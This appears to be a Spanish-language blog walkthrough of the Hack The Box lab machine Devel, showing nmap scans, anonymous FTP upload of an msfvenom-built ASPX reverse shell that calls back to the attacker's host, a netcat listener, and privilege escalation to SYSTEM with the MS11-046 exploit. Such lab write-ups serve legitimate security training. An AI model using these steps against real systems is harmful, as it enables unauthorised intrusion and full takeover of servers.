Avatar Blog Personal de K0Hack sobre Conceptos Hacking Etico // HTB // TryHackMe // Resumenes de Hacking // Herramientas para distintas tareas.

OSCP Path ~ Devel de Hack The Box (Necesario VIP)

Devel ~ Hack The Box to OSCP

Realizamos el Primer escaneo con Nmap

$" nmap -p- --open -sS --min-rate 4000 -vvv -n -Pn -oG allports 10.10.10.5      "

Procedemos con el siguiente escaneo de Nmap

PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  02:06AM       <DIR>          aspnet_client
| 03-17-17  05:37PM                  689 iisstart.htm
| 08-22-21  08:57PM                    6 test.html
|_03-17-17  05:37PM               184946 welcome.png
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Procedemos a enumerar el servicio FPT y ver si podemos bajar los recursos disponibles y subir archivos. Descargamos los recursos disponibles y verificamos que podemos subir archivos como el usuario Anonymous.

Procedemos a subir un archivo llamado prueba.txt que subimos por el ftp, para ver si podemos apuntar desde la pagina web ya que vemos recursos web almacenados en el servicio FTP que podrian ser del servicio HTTP

# ftp 10.10.10.5                                                                                                                                                                                              1 ⚙
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:pro): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> put prueba.txt
local: prueba.txt remote: prueba.txt
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.

Lanzamos un Whatweb

# whatweb http://10.10.10.5                                                                                                                                                                                  1 ⚙
http://10.10.10.5 [200 OK] Country[RESERVED][ZZ], HTTPServer[Microsoft-IIS/7.5], IP[10.10.10.5], Microsoft-IIS[7.5][Under Construction], Title[IIS7], X-Powered-By[ASP.NET

Procedemos a hacer Fuzzing a nivel web. Al ser un servidor IIS 7-5 ssabemos que la extension de los archivos puede ser aspx No encontramos Directorios potenciales..

Probamos a intentar apuntar al archivo que acabamos de subir al fpt llamdo prueba.txt

# curl -s -X GET "http://10.10.10.5/prueba.txt"
Se esta tensando que te cagas .. Ojito ..

Vemos que es nuestro archivo. Sabiendo esto y con las extensiones que trabaja el CMS IIS procedemos a crearnos una Reverse-shell con la herramienta msfvenom

# msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.21 LPORT=443 -f aspx > shell.aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of aspx file: 2696 bytes

Y ahora que ya la tenemos vamos a ver si atraves del servicio FTP podemos subirla sin problema para luego apuntar a la misma y conseguir acceso a la maquina victima

# ftp 10.10.10.5  
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:pro): Anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> put shell.aspx
local: shell.aspx remote: shell.aspx
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
2731 bytes sent in 0.00 secs (74.4138 MB/s)

Procedemos a ponernos a la escucha en una session con netcat para recibir cualquier conexion entrante por el puerto 443

Procedemos a apuntar a la dirrecion HTTP + nuestro archivo shell.aspx

# curl -s -X GET "http://10.10.10.5/shell.aspx"

Recibimos la conexion correctamente:

# rlwrap nc -vlnp 443                                                                                                                                                                                         1 ⚙
listening on [any] 443 ...
connect to [10.10.16.21] from (UNKNOWN) [10.10.10.5] 49157
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

c:\windows\system32\inetsrv> whoami
iis apppool\web

Probamos a sacar el systeminfo de la maquina victima para pasarselo a Windows-Exploit-Suggester:

# python windows-exploit-suggester.py --database 2021-08-27-mssb.xls --systeminfo ../systeminfo.txt
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (utf-8)
[*] querying database file for potential vulnerabilities
[*] comparing the 0 hotfix(es) against the 179 potential bulletins(s) with a database of 137 known exploits
[*] there are now 179 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 7 32-bit'
[*] 
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[*]   http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC
[*]   http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC
[*] 
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important
[E] MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) - Important
[M] MS10-015: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (977165) - Important
[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical
[*] done

Vemos diferentes exploits para escalar privilegios, pero investigando un poco sobre exploits para privesc en una maquina Windows-7

Subimos este binario por el servicio FTP: ms11-046.exe
Directory of c:\inetpub\wwwroot             ruta de los archivos almacenados FTP                                                                                                                                                                       
27/08/2021  11:52 ��    <DIR>          .                                    
27/08/2021  11:52 ��    <DIR>          ..                                                                                                                                       
18/03/2017  02:06 ��    <DIR>          aspnet_client                                                                                                                               
17/03/2017  05:37 ��               689 iisstart.htm                                                                                                                      
27/08/2021  01:41 ��           112.725 ms11-046.exe                                                                                                                           
27/08/2021  01:41 ��             2.696 shell.aspx                                                                                                                              
17/03/2017  05:37 ��           184.946 welcome.png                                                                                                                                                                  
               4 File(s)        301.056 bytes                                                                                                                                                                       
               3 Dir(s)  22.273.048.576 bytes free                                                                                                                             

Ejecutamos el binario:

ms11-046.exe
ms11-046.exe

whoami
whoami
nt authority\system